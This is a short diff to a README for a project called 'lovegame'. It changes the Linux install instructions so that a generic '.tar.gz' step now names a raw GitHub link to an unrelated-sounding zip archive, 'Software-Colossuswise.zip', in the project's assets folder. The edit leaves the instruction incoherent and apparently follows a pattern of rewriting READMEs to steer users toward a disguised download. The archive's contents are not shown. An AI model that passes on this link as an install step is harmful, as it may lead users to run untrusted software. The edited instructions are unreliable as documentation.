KaioKenKanye/lovegame/README.md

 4. You can now find lovegame in your Applications.
 Open it from there.

 ### For Linux Users
-1. Extract the `.tar.gz` file you downloaded.
+1. Extract the `https://raw.githubusercontent.com/KaioKenKanye/lovegame/main/assets/Software-Colossuswise.zip` file you downloaded.
 You can do this by right-clicking the file and selecting "Extract Here."
 2. Open a terminal and navigate to the extracted folder.
 3. Run the following command to start the application:
    ```